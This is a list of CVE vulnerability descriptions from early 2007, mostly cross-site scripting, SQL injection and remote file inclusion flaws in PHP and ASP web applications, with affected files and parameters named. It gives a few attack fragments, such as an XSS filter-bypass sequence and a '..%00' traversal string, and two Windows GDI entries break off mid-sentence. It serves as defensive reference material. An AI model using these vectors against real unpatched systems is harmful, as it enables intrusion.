[CVE-2007-1443] Multiple cross-site scripting (XSS) vulnerabilities in register.php in Woltlab Burning Board (wBB) 2.3.6 and Burning Board Lite 1.0.2pl3e allow remote attackers to inject arbitrary web script or HTML via the (1) r_username, (2) r_email, (3) r_password, (4) r_confirmpassword, (5) r_homepage, (6) r_icq, (7) r_aim, (8) r_yim, (9) r_msn, (10) r_year, (11) r_month, (12) r_day, (13) r_gender, (14) r_signature, (15) r_usertext, (16) r_invisible, (17) r_usecookies, (18) r_admincanemail, (19) r_emailnotify, (20) r_notificationperpm, (21) r_receivepm, (22) r_emailonpm, (23) r_pmpopup, (24) r_showsignatures, (25) r_showavatars, (26) r_showimages, (27) r_daysprune, (28) r_umaxposts, (29) r_dateformat, (30) r_timeformat, (31) r_startweek, (32) r_timezoneoffset, (33) r_usewysiwyg, (34) r_styleid, (35) r_langid, (36) key_string, (37) key_number, (38) disablesmilies, (39) disablebbcode, (40) disableimages, (41) field[1], (42) field[2], and (43) field[3] parameters. NOTE: a third-party researcher has disputed some of these vectors, stating that only the r_dateformat and r_timeformat parameters in Burning Board 2.3.6 are affected.
[CVE-2007-1433] Cross-site scripting (XSS) vulnerability in Grayscale Blog 0.8.0, and possibly earlier versions, allows remote attackers to inject arbitrary web script or HTML via the comment fields to (1) scripts/addblog_comment.php and (2) detail.php.
[CVE-2007-1418] Cross-site scripting (XSS) vulnerability in skins/ace/popup-notopic.php in MindTouch OpenGarden DekiWiki before Gooseberry++ allows remote attackers to inject arbitrary web script or HTML via the message parameter.
[CVE-2007-1405] Cross-site scripting (XSS) vulnerability in the "download wiki page as text" feature in Trac before 0.10.3.1, when Microsoft Internet Explorer is used, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
[CVE-2007-1391] PHP remote file inclusion vulnerability in modules/abook/foldertree.php in Leo West WEBO (aka weborganizer) 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the baseDir parameter.
[CVE-2007-1390] Multiple cross-site scripting (XSS) vulnerabilities in dynaliens 2.0 and 2.1 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters to (1) recherche.php3 or (2) ajouter.php3.
[CVE-2007-1374] Cross-site scripting (XSS) vulnerability in pop_profile.asp in Snitz Forums 2000 3.4.06 allows remote attackers to inject arbitrary web script or HTML via the MSN parameter. NOTE: the provenance of this information is unknown.
[CVE-2007-1367] Cross-site scripting (XSS) vulnerability in the login page in Avaya Communications Manager (CM) S87XX, S8500, and S8300 products before 3.1.3 allows remote attackers to inject arbitrary web script or HTML via the Login field.
[CVE-2007-1361] Cross-site scripting (XSS) vulnerability in virtuemart_parser.php in VirtueMart before 20070213 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: this issue is probably different than CVE-2007-0376.
[CVE-2007-1358] Cross-site scripting (XSS) vulnerability in certain applications using Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.34 allows remote attackers to inject arbitrary web script or HTML via crafted "Accept-Language headers that do not conform to RFC 2616".
[CVE-2007-1355] Multiple cross-site scripting (XSS) vulnerabilities in the appdev/sample/web/hello.jsp example application in Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.23, and 6.0.0 through 6.0.10 allow remote attackers to inject arbitrary web script or HTML via the test parameter and unspecified vectors.
[CVE-2007-1350] Stack-based buffer overflow in webadmin.exe in Novell NetMail 3.5.2 allows remote attackers to execute arbitrary code via a long username during HTTP Basic authentication.
[CVE-2007-1345] Unspecified vulnerability in cube.exe in the GINA component for CA (Computer Associates) eTrust Admin 8.1.0 through 8.1.2 allows attackers with physical interactive or Remote Desktop access to bypass authentication and gain privileges via the password reset interface.
[CVE-2007-1343] includes/functions.php in Craig Knudsen WebCalendar before 1.0.5 does not protect the noSet variable from external modification, which allows remote attackers to set arbitrary global variables via a URL with modified values in the noSet parameter, which leads to resultant vulnerabilities that probably include remote file inclusion and other issues.
[CVE-2007-1342] Cross-site scripting (XSS) vulnerability in admincp/index.php in Jelsoft vBulletin 3.6.5 and earlier allows remote attackers to inject arbitrary web script or HTML via the add rss url form.
[CVE-2007-1331] Multiple cross-site scripting (XSS) vulnerabilities in TKS Banking Solutions ePortfolio 1.0 Java allow remote attackers to inject arbitrary web script or HTML via unspecified vectors that bypass the client-side protection scheme, one of which may be the q parameter to the search program. NOTE: some of these details are obtained from third party information.
[CVE-2007-1328] Cross-site scripting (XSS) vulnerability in formulaire.php in Bernard JOLY BJ Webring allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter related to the add link menu.
[CVE-2007-1325] The PMA_ArrayWalkRecursive function in libraries/common.lib.php in phpMyAdmin before 2.10.0.2 does not limit recursion on arrays provided by users, which allows context-dependent attackers to cause a denial of service (web server crash) via an array with many dimensions. NOTE: it could be argued that this vulnerability is caused by a problem in PHP (CVE-2006-1549) and the proper fix should be in PHP.
[CVE-2007-1319] Unspecified vulnerability in the IOPCServer::RemoveGroup function in the OPCDA interface in Takebishi Electric DeviceXPlorer OLE for Process Control (OPC) Server before 3.12 Build3 allows remote attackers to execute arbitrary code via unspecified vectors involving access to arbitrary memory. NOTE: this issue affects the (1) HIDIC, (2) MELSEC, (3) FA-M3, (4) MODBUS, and (5) SYSMAC OPC Servers.
[CVE-2007-1305] Multiple cross-site scripting (XSS) vulnerabilities in add2.php in Sava's Guestbook 23.11.2006 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) country, (3) email, and (4) website parameters.
[CVE-2007-1304] Multiple SQL injection vulnerabilities in add2.php in Sava's Guestbook 23.11.2006, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) name, (2) country, (3) email, (4) website, and (5) message parameters.
[CVE-2007-1300] DOURAN Software Technologies ISPUtil 3.32.84.1, and possibly earlier versions, stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain user and reseller data via a direct request for scripts/activesessions.ini. NOTE: the provenance of this information is unknown.
[CVE-2007-1294] A certain ActiveX control in the DivXBrowserPlugin (npdivx32.dll) in DivX Web Player, as distributed with DivX Player 1.3.0, allows remote attackers to cause a denial of service (Internet Explorer 7 crash) via large values to DivxWP.Resize, related to resizing images.
[CVE-2007-1291] Multiple cross-site scripting (XSS) vulnerabilities in Tyger Bug Tracking System (TygerBT) 1.1.3 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) Login.php and (2) Register.php.
[CVE-2007-1288] Multiple PHP remote file inclusion vulnerabilities in Webmobo WB News 1.4.1 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the config[installdir] parameter to (1) comment.php, (2) themes.php, (3) directory.php, and (4) sendmsg.php in admin/.
[CVE-2007-1280] Cross-site scripting (XSS) vulnerability in Adobe RoboHelp X5, 6, and Server 6 allows remote attackers to inject arbitrary web script or HTML via a URL after a # (hash) in the URL path, as demonstrated using en/frameset-7.html, and possibly other unspecified vectors involving templates and (1) whstart.js and (2) whcsh_home.htm in WebHelp, (3) wf_startpage.js and (4) wf_startqs.htm in FlashHelp, or (5) WindowManager.dll in RoboHelp Server 6.
[CVE-2007-1278] Unspecified vulnerability in the IIS connector in Adobe JRun 4.0 Updater 6, and ColdFusion MX 6.1 and 7.0 Enterprise, when using Microsoft IIS 6, allows remote attackers to cause a denial of service via unspecified vectors, involving the request of a file in the JRun web root.
[CVE-2007-1276] Multiple cross-site scripting (XSS) vulnerabilities in chooser.cgi in Webmin before 1.330 and Usermin before 1.260 allow remote attackers to inject arbitrary web script or HTML via a crafted filename.
[CVE-2007-1262] Multiple cross-site scripting (XSS) vulnerabilities in the HTML filter in SquirrelMail 1.4.0 through 1.4.9a allow remote attackers to inject arbitrary web script or HTML via the (1) data: URI in an HTML e-mail attachment or (2) various non-ASCII character sets that are not properly filtered when viewed with Microsoft Internet Explorer.
[CVE-2007-1260] Stack-based buffer overflow in the connectHandle function in server.cpp in WebMod 0.48 allows remote attackers to execute arbitrary code via a long string in the Content-Length HTTP header.
[CVE-2007-1259] Multiple unspecified vulnerabilities in WebAPP before 0.9.9.6 have unknown impact and attack vectors.
[CVE-2007-1256] Mozilla Firefox 2.0.0.2 allows remote attackers to spoof the address bar, favicons, and document source, and perform updates in the context of arbitrary websites, by repeatedly setting document.location in the onunload attribute when linking to another website, a variant of CVE-2007-1092.
[CVE-2007-1248] Multiple cross-site scripting (XSS) vulnerabilities in built2go News Manager Blog 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) cid, (2) uid, and (3) nid parameters to (a) news.php, and the nid parameter to (b) rating.php.
[CVE-2007-1247] Multiple PHP remote file inclusion vulnerabilities in aWeb Labs aWebNews 1.5 allow remote attackers to execute arbitrary PHP code via a URL in the path_to_news parameter to (1) listing.php or (2) visview.php.
[CVE-2007-1241] Cross-site scripting (XSS) vulnerability in setup.php in Audins Audiens 3.3 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. NOTE: the provenance of this information is unknown.
[CVE-2007-1240] Multiple cross-site scripting (XSS) vulnerabilities in Docebo CMS 3.0.3 through 3.0.5 allow remote attackers to inject arbitrary web script or HTML via (1) the searchkey parameter to index.php, or the (2) sn or (3) ri parameter to modules/htmlframechat/index.php. NOTE: the provenance of this information is unknown.
[CVE-2007-1234] Multiple cross-site scripting (XSS) vulnerabilities in sitex allow remote attackers to inject arbitrary web script or HTML via (1) the sxYear parameter to calendar.php, (2) the search parameter to search.php, (3) the linkid parameter to redirect.php, or (4) the page parameter to calendar_events.php.
[CVE-2007-1231] Multiple cross-site scripting (XSS) vulnerabilities in SQLiteManager 1.2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) database name, (2) table name, (3) ViewName, (4) view, (5) trigger, and (6) function fields in main.php and certain other files.
[CVE-2007-1230] Multiple cross-site scripting (XSS) vulnerabilities in wp-includes/functions.php in WordPress before 2.1.2-alpha allow remote attackers to inject arbitrary web script or HTML via (1) the Referer HTTP header or (2) the URI, a different vulnerability than CVE-2007-1049.
[CVE-2007-1215] Buffer overflow in the Graphics Device Interface (GDI) in Microsoft Windows 2000 SP4
[CVE-2007-1212] Buffer overflow in the Graphics Device Interface (GDI) in Microsoft Windows 2000 SP4
[CVE-2007-1201] Unspecified vulnerability in certain COM objects in Microsoft Office Web Components 2000 allows user-assisted remote attackers to execute arbitrary code via vectors related to DataSource that trigger memory corruption, aka "Office Web Components DataSource Vulnerability."
[CVE-2007-1198] Cross-site scripting (XSS) vulnerability in TaskFreak! before 0.5.7 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly a variant of CVE-2007-0982.
[CVE-2007-1196] Unspecified vulnerability in Citrix Presentation Server Client for Windows before 10.0 allows remote web sites to execute arbitrary code via unspecified vectors, related to the implementation of ICA connectivity through proxy servers.
[CVE-2007-1192] Thomas R. Pasawicz HyperBook Guestbook 1.30 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download an admin password hash via a direct request for data/gbconfiguration.dat.
[CVE-2007-1190] Unspecified vulnerability in the EmbeddedWB Web Browser ActiveX control allows remote attackers to execute arbitrary code via unspecified vectors. NOTE: the provenance of this information is unknown.
[CVE-2007-1188] WebAPP before 0.9.9.5 allows remote attackers to submit Search form input that is not checked for (1) composition or (2) length, which has unknown impact, possibly related to "search form hijacking".
[CVE-2007-1187] WebAPP before 0.9.9.5 allows remote authenticated users, without admin privileges, to obtain sensitive information via (1) the Forum Archive feature and (2) Recent Searches.
[CVE-2007-1186] WebAPP before 0.9.9.5 does not "censor" the Latest Member real name, which has unknown impact.
[CVE-2007-1185] The (1) Search, (2) Edit Profile, (3) Recommend, and (4) User Approval forms in WebAPP before 0.9.9.5 use hidden inputs, which has unknown impact and remote attack vectors.
[CVE-2007-1184] The default configuration of WebAPP before 0.9.9.5 has a CAPTCHA setting of "no," which makes it easier for automated programs to submit false data.
[CVE-2007-1183] WebAPP before 0.9.9.5 allows remote authenticated users to spoof another user's Real Name via whitespace, which has unknown impact and attack vectors.
[CVE-2007-1182] WebAPP before 0.9.9.5 allows remote Guest users to edit a Guest profile, which has unknown impact.
[CVE-2007-1181] WebAPP before 0.9.9.5 passes (1) Unused Informations and (2) the username through Edit Profile forms, which has unknown impact and attack vectors.
[CVE-2007-1180] WebAPP before 0.9.9.5 does not check referrers in certain forms, which might facilitate remote cross-site request forgery (CSRF) attacks or have other unknown impact.
[CVE-2007-1179] WebAPP before 0.9.9.5 does not properly manage e-mail addresses in certain contexts related to (1) the Recommend feature, Email Article (2) senders and (3) recipients, (4) New User Approval, (5) Edit Profiles, (6) the Newsletter Subscription form, (7) the Recommend form, and (8) sending of articles, which has unknown impact, and remote attack vectors related to spam attacks and possibly other attacks.
[CVE-2007-1178] WebAPP before 0.9.9.5 does not check access in certain contexts related to (1) Calendar Administration, (2) Instant Messages Administration, and (3) the Image Uploader, which has unknown impact and attack vectors.
[CVE-2007-1177] WebAPP before 0.9.9.5 does not properly filter certain characters in contexts related to (1) the query string, (2) Profiles, (3) the Forum Post icon field, (4) the Edit Profile, and (5) the Gallery, which has unknown impact and remote attack vectors, possibly related to cross-site scripting (XSS).
[CVE-2007-1176] Multiple cross-site scripting (XSS) vulnerabilities in WebAPP before 0.9.9.5 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to (1) Gallery Comments pages, (2) Feedback pages, (3) Search Results pages, and (4) the Statistics Log viewer.
[CVE-2007-1175] Cross-site scripting (XSS) vulnerability in an admin feature in WebAPP before 20070209 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-1174] Multiple cross-site scripting (XSS) vulnerabilities in WebAPP before 20070214 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to unspecified fields in user Profiles. NOTE: some of these details are obtained from third party information.
[CVE-2007-1163] SQL injection vulnerability in printview.php in webSPELL 4.01.02 and earlier allows remote attackers to execute arbitrary SQL commands via the topic parameter, a different vector than CVE-2007-1019, CVE-2006-5388, and CVE-2006-4783.
[CVE-2007-1161] Cross-site scripting (XSS) vulnerability in call_entry.php in Call Center Software 0,93 allows remote attackers to inject arbitrary web script or HTML via the problem_desc parameter, as demonstrated by the ONLOAD attribute of a BODY element.
[CVE-2007-1160] webSPELL 4.0, and possibly later versions, allows remote attackers to bypass authentication via a ws_auth cookie, a different vulnerability than CVE-2006-4782.
[CVE-2007-1159] Cross-site scripting (XSS) vulnerability in modules/out.php in Pyrophobia 2.1.3.1 allows remote attackers to inject arbitrary web script or HTML via the id parameter. NOTE: the provenance of this information is unknown.
[CVE-2007-1155] Unrestricted file upload vulnerability in webSPELL allows remote authenticated administrators to upload and execute arbitrary PHP code via the add squad feature. NOTE: this issue may be an administrative feature, in which case this CVE may be REJECTED.
[CVE-2007-1154] SQL injection vulnerability in webSPELL allows remote attackers to execute arbitrary SQL commands via a ws_auth cookie, a different vulnerability than CVE-2006-4782.
[CVE-2007-1151] Cross-site scripting (XSS) vulnerability in LoveCMS 1.4 allows remote attackers to inject arbitrary web script or HTML via the id parameter to the top-level URI, possibly related to a SQL error.
[CVE-2007-1145] Multiple cross-site scripting (XSS) vulnerabilities in Kayako SupportSuite - ESupport 3.00.13 and 3.04.10 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to a (1) lostpassword or (2) register action in index.php, (3) unspecified vectors in the Submit form in a submit action in index.php, and (4) the user's name in index.php.
[CVE-2007-1144] Directory traversal vulnerability in jwpn-photos.php in J-Web Pics Navigator 2.0 allows remote attackers to list arbitrary directories via a .. (dot dot) in the dir parameter.
[CVE-2007-1143] Directory traversal vulnerability in pn-menu.php in J-Web Pics Navigator 1.0 allows remote attackers to list arbitrary directories via a .. (dot dot) in the dir parameter.
[CVE-2007-1142] Cross-site scripting (XSS) vulnerability in Magic News Plus 1.0.2 allows remote attackers to inject arbitrary web script or HTML via the link_parameters parameter in (1) news.php and (2) n_layouts.php.
[CVE-2007-1136] index.php in WebMplayer before 0.6.1-Alpha allows remote attackers to execute arbitrary code via shell metacharacters in an exec function call. NOTE: some sources have referred to this as eval injection in the param parameter, but CVE source inspection suggests that this is erroneous.
[CVE-2007-1135] Multiple SQL injection vulnerabilities in WebMplayer before 0.6.1-Alpha allow remote attackers to execute arbitrary SQL commands via the (1) strid parameter to index.php and the (2) id[0] or other id array index parameter to filecheck.php.
[CVE-2007-1132] Multiple cross-site scripting (XSS) vulnerabilities in the "Contact Us" functionality in MTCMS 2.2 allow remote attackers to inject arbitrary web script or HTML via the (1) message and (2) title fields.
[CVE-2007-1125] Cross-site scripting (XSS) vulnerability in gallery.php in XeroXer Simple one-file gallery allows remote attackers to inject arbitrary web script or HTML via the f parameter.
[CVE-2007-1111] Multiple cross-site scripting (XSS) vulnerabilities in ActiveCalendar 1.2.0 allow remote attackers to inject arbitrary web script or HTML via the css parameter to (1) flatevents.php, (2) js.php, (3) mysqlevents.php, (4) m_2.php, (5) m_3.php, (6) m_4.php, (7) xmlevents.php, (8) y_2.php, or (9) y_3.php in data/.
[CVE-2007-1109] Multiple cross-site scripting (XSS) vulnerabilities in Phpwebgallery 1.4.1 allow remote attackers to inject arbitrary web script or HTML via the (1) login or (2) mail_address field in Register.php, or the (3) search_author, (4) mode, (5) start_year, (6) end_year, or (7) date_type field in Search.php, a different vulnerability than CVE-2006-1674. NOTE: 1.6.2 and other versions might also be affected.
[CVE-2007-1101] Multiple cross-site scripting (XSS) vulnerabilities in Photostand 1.2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) message ("comment") or (2) name field, or the (3) q parameter in a search action in index.php.
[CVE-2007-1096] Cross-site scripting (XSS) vulnerability in ps_cart.php in VirtueMart before 20070116 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: this issue might overlap CVE-2007-0376.
[CVE-2007-1095] Mozilla Firefox before 2.0.0.8 and SeaMonkey before 1.1.5 do not properly implement JavaScript onUnload handlers, which allows remote attackers to run certain JavaScript code and access the location DOM hierarchy in the context of the next web site that is visited by a client.
[CVE-2007-1093] Multiple unspecified vulnerabilities in JP1/Cm2/Network Node Manager (NNM) before 07-10-05, and before 08-00-02 in the 08-x series, allow remote attackers to execute arbitrary code, cause a denial of service, or trigger invalid Web utility behavior.
[CVE-2007-1085] Cross-site scripting (XSS) vulnerability in Google Desktop allows remote attackers to bypass protection schemes and inject arbitrary web script or HTML, and possibly gain full access to the system, by using an XSS vulnerability in google.com to extract the signature for the internal web server, then calling the "under" parameter in Advanced Search with the proper signature.
[CVE-2007-1084] Mozilla Firefox 2.0.0.1 and earlier does not prompt users before saving bookmarklets, which allows remote attackers to bypass the same-domain policy by tricking a user into saving a bookmarklet with a data: scheme, which is executed in the context of the last visited web page.
[CVE-2007-1072] The command line interface (CLI) in Cisco Unified IP Phone 7906G, 7911G, 7941G, 7961G, 7970G, and 7971G, with firmware 8.0(4)SR1 and earlier allows local users to obtain privileges or cause a denial of service via unspecified vectors. NOTE: this issue can be leveraged remotely via CVE-2007-1063.
[CVE-2007-1062] The Cisco Unified IP Conference Station 7935 3.2(15) and earlier, and Station 7936 3.3(12) and earlier does not properly handle administrator HTTP sessions, which allows remote attackers to bypass authentication controls via a direct URL request to the administrative HTTP interface for a limited time.
[CVE-2007-1058] SQL injection vulnerability in user_pages/page.asp in Online Web Building 2.0 allows remote attackers to execute arbitrary SQL commands via the art_id parameter.
[CVE-2007-1055] Cross-site scripting (XSS) vulnerability in the AJAX features in index.php in MediaWiki 1.9.x before 1.9.0rc2, and 1.8.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the rs parameter. NOTE: this issue might be a duplicate of CVE-2007-0177.
[CVE-2007-1054] Cross-site scripting (XSS) vulnerability in the AJAX features in index.php in MediaWiki 1.6.x through 1.9.2, when $wgUseAjax is enabled, allows remote attackers to inject arbitrary web script or HTML via a UTF-7 encoded value of the rs parameter, which is processed by Internet Explorer.
[CVE-2007-1050] Multiple cross-site scripting (XSS) vulnerabilities in index.php in AbleDesign MyCalendar allow remote attackers to inject arbitrary web script or HTML via (1) the go parameter, (2) the keyword parameter in the search menu (go=search), or (3) the username or (4) the password in a go=Login action.
[CVE-2007-1049] Cross-site scripting (XSS) vulnerability in the wp_explain_nonce function in the nonce AYS functionality (wp-includes/functions.php) for WordPress 2.0 before 2.0.9 and 2.1 before 2.1.1 allows remote attackers to inject arbitrary web script or HTML via the file parameter to wp-admin/templates.php, and possibly other vectors involving the action variable.
[CVE-2007-1043] Ezboo webstats, possibly 3.0.3, allows remote attackers to bypass authentication and gain access via a direct request to (1) update.php and (2) config.php.
[CVE-2007-1028] Cross-site scripting (XSS) vulnerability in the Barry Jaspan Image Pager 4.7.x-1.x-dev and 5.x-1.x-dev before 2007-02-08 module for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to HTML entities and the IMG element.
[CVE-2007-1020] Cross-site scripting (XSS) vulnerability in index.php in CedStat 1.31 allows remote attackers to inject arbitrary web script or HTML via the hier parameter.
[CVE-2007-1019] SQL injection vulnerability in news.php in webSPELL 4.01.02, when register_globals is enabled, allows remote attackers to execute arbitrary SQL commands via the showonly parameter to index.php, a different vector than CVE-2006-5388.
[CVE-2007-1012] Cross-site scripting (XSS) vulnerability in faq.php in DeskPRO 1.1.0 allows remote attackers to inject arbitrary web script or HTML via the article parameter.
[CVE-2007-0982] Cross-site scripting (XSS) vulnerability in error.php in TaskFreak! 0.5.5 allows remote attackers to inject arbitrary web script or HTML via the tznMessage parameter. NOTE: the provenance of this information is unknown.
[CVE-2007-0977] IBM Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, stores HTTPPassword hashes from names.nsf in a manner accessible through Readviewentries and OpenDocument requests to the defaultview view, a different vector than CVE-2005-2428.
[CVE-2007-0973] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Jupiter CMS 1.1.5 allow remote attackers to inject arbitrary web script or HTML via the Referer HTTP header and certain other HTTP headers, which are displayed without proper sanitization when an administrator performs a Logged Guest action.
[CVE-2007-0970] Multiple SQL injection vulnerabilities in WebTester 5.0.20060927 and earlier allow remote attackers to execute arbitrary SQL commands via the testID parameter to directions.php, and unspecified parameters to other files that accept GET or POST input.
[CVE-2007-0969] Multiple cross-site scripting (XSS) vulnerabilities in WebTester 5.0.20060927 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to POST parameters to multiple files.
[CVE-2007-0953] Cross-site scripting (XSS) vulnerability in search.pl in @Mail 4.61 and earlier allows remote attackers to inject arbitrary web script or HTML via the keywords parameter.
[CVE-2007-0952] Multiple cross-site scripting (XSS) vulnerabilities in Scriptsez.net Virtual Calendar allow remote attackers to inject arbitrary web script or HTML via the (1) t and (2) yr parameters, and the (3) sho parameter when the m parameter is outside the intended range.
[CVE-2007-0950] Cross-site scripting (XSS) vulnerability in listmain.asp in Fullaspsite ASP Hosting Site allows remote attackers to inject arbitrary web script or HTML via the cat parameter.
[CVE-2007-0939] Cross-site scripting (XSS) vulnerability in Microsoft Content Management Server (MCMS) 2001 SP1 and 2002 SP2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving HTML redirection queries, aka "Cross-site Scripting and Spoofing Vulnerability."
[CVE-2007-0932] The (1) Aruba Mobility Controllers 200, 600, 2400, and 6000 and (2) Alcatel-Lucent OmniAccess Wireless 43xx and 6000 do not properly implement authentication and privilege assignment for the guest account, which allows remote attackers to access administrative interfaces or the WLAN.
[CVE-2007-0931] Heap-based buffer overflow in the management interfaces in (1) Aruba Mobility Controllers 200, 800, 2400, and 6000 and (2) Alcatel-Lucent OmniAccess Wireless 43xx and 6000 allows remote attackers to cause a denial of service (process crash) and possibly execute arbitrary code via long credential strings.
[CVE-2007-0928] Virtual Calendar stores sensitive information under the web root with insufficient access control, which allows remote attackers to download an encoded password via a direct request for pwd.txt.
[CVE-2007-0925] Cross-site scripting (XSS) vulnerability in search/SearchResults.aspx in Community Server allows remote attackers to inject arbitrary web script or HTML via the q parameter.
[CVE-2007-0922] Cross-site scripting (XSS) vulnerability in buscador/buscador.htm in Portal Search allows remote attackers to inject arbitrary web script or HTML via the query string.
[CVE-2007-0921] Portal Search allows remote attackers to redirect a URL to an arbitrary web site by placing the URL in the query string to the top-level URI.
[CVE-2007-0919] Directory traversal vulnerability in Nickolas Grigoriadis Mini Web server (MiniWebsvr) 0.0.6 allows remote attackers to list the directory immediately above the web root via a ..%00 sequence in the URI.
[CVE-2007-0901] Multiple cross-site scripting (XSS) vulnerabilities in Info pages in MoinMoin 1.5.7 allow remote attackers to inject arbitrary web script or HTML via the (1) hitcounts and (2) general parameters, different vectors than CVE-2007-0857. NOTE: the provenance of this information is unknown.
[CVE-2007-0896] Cross-site scripting (XSS) vulnerability in the (1) Sage before 1.3.10, and (2) Sage++ extensions for Firefox, allows remote attackers to inject arbitrary web script or HTML via a "<SCRIPT/=''SRC='" sequence in an RSS feed, a different vulnerability than CVE-2006-4712.
[CVE-2007-0891] Cross-site scripting (XSS) vulnerability in the GetCurrentCompletePath function in phpmyvisites.php in phpMyVisites before 2.2 allows remote attackers to inject arbitrary web script or HTML via the query string.
[CVE-2007-0890] Cross-site scripting (XSS) vulnerability in scripts/passwdmysql in cPanel WebHost Manager (WHM) 11.0.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the password parameter.
[CVE-2007-0885] Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2007-0880] Capital Request Forms stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain database credentials via a direct request for inc/common_db.inc.
[CVE-2007-0876] Cross-site scripting (XSS) vulnerability in Quick Digital Image Gallery (Qdig) 1.2.9.3 and devel-20060624 allows remote attackers to inject arbitrary web script or HTML via the Qwd parameter to the top-level URI.
[CVE-2007-0872] Directory traversal vulnerability in the Plain Old Webserver (POW) add-on before 0.0.9 for Mozilla Firefox allows remote attackers to read arbitrary files via a .. (dot dot) in the URI.
[CVE-2007-0869] Cross-site scripting (XSS) vulnerability in the Attachment Manager (admincp/attachment.php) in Jelsoft vBulletin 3.6.4 allows remote attackers to inject arbitrary web script or HTML via the Extension field. NOTE: this might be a duplicate of CVE-2007-0830.5. NOTE: the provenance of this information is unknown.
[CVE-2007-0857] Multiple cross-site scripting (XSS) vulnerabilities in MoinMoin before 1.5.7 allow remote attackers to inject arbitrary web script or HTML via (1) the page info, or the page name in a (2) AttachFile, (3) RenamePage, or (4) LocalSiteMap action.
[CVE-2007-0856] TmComm.sys 1.5.0.1052 in the Trend Micro Anti-Rootkit Common Module (RCM), with the VsapiNI.sys 3.320.0.1003 scan engine, as used in Trend Micro PC-cillin Internet Security 2007, Antivirus 2007, Anti-Spyware for SMB 3.2 SP1, Anti-Spyware for Consumer 3.5, Anti-Spyware for Enterprise 3.0 SP2, Client / Server / Messaging Security for SMB 3.5, Damage Cleanup Services 3.2, and possibly other products, assigns Everyone write permission for the \\.\TmComm DOS device interface, which allows local users to access privileged IOCTLs and execute arbitrary code or overwrite arbitrary memory in the kernel context.
[CVE-2007-0854] Remote file inclusion vulnerability in scripts2/objcache in cPanel WebHost Manager (WHM) allows remote attackers to execute arbitrary code via a URL in the obj parameter. NOTE: a third party claims that this issue is not file inclusion because the contents are not parsed, but the attack can be used to overwrite files in /var/cpanel/objcache or provide unexpected web page contents.
[CVE-2007-0852] Cross-site scripting (XSS) vulnerability in DevTrack 6.x allows remote attackers to inject arbitrary web script or HTML via the "Keyword search" form field and unspecified other form fields that populate a public saved query. NOTE: the provenance of this information is unknown.
[CVE-2007-0846] Cross-site scripting (XSS) vulnerability in forum.php in Open Tibia Server CMS (OTSCMS) 2.1.5 and earlier allows remote attackers to inject arbitrary HTML or web script via the name parameter.
[CVE-2007-0840] Cross-site scripting (XSS) vulnerability in HLstats before 1.35 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors in the search class. NOTE: it is possible that this issue overlaps CVE-2006-4543.3 or CVE-2006-4454.
[CVE-2007-0839] Multiple PHP remote file inclusion vulnerabilities in index/index_album.php in Valarsoft WebMatic 2.6 allow remote attackers to execute arbitrary PHP code via a URL in the (1) P_LIB and (2) P_INDEX parameters.
[CVE-2007-0834] Cross-site scripting (XSS) vulnerability in FlashChat 4.7.8 allows remote attackers to inject arbitrary web script or HTML via the user name field when the user joins a chat room, a different vulnerability than CVE-2007-0807. NOTE: the provenance of this information is unknown.
[CVE-2007-0830] ** DISPUTED ** Multiple cross-site scripting (XSS) vulnerabilities in the Admin Control Panel (AdminCP) in Jelsoft vBulletin 3.6.4 allow remote authenticated administrators to inject arbitrary web script or HTML via unspecified vectors related to the (1) User Group Manager, (2) User Rank Manager, (3) User Title Manager, (4) BB Code Manager, (5) Attachment Manager, (6) Calendar Manager, and (7) Forums & Moderators functions. NOTE: the vendor disputes this issue, stating that modifying HTML is an intended privilege of an administrator. NOTE: it is possible that this issue overlaps CVE-2006-6040.
[CVE-2007-0817] Cross-site scripting (XSS) vulnerability in Adobe ColdFusion web server allows remote attackers to inject arbitrary HTML or web script via the User-Agent HTTP header, which is not sanitized before being displayed in an error page.
[CVE-2007-0815] Cross-site scripting (XSS) vulnerability in images_archive.asp in Uapplication Uphotogallery 1.1 allows remote authenticated administrators to inject arbitrary web script or HTML via the s parameter. NOTE: the thumbnails.asp vector is already covered by CVE-2006-3023.
[CVE-2007-0814] Multiple cross-site scripting (XSS) vulnerabilities in Adrenalin's ASP Chat allow remote attackers to inject arbitrary web script or HTML (1) via the psuedo (pseudo) field or (2) during chat.
[CVE-2007-0813] Cross-site scripting (XSS) vulnerability in Home production MySearchEngine allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
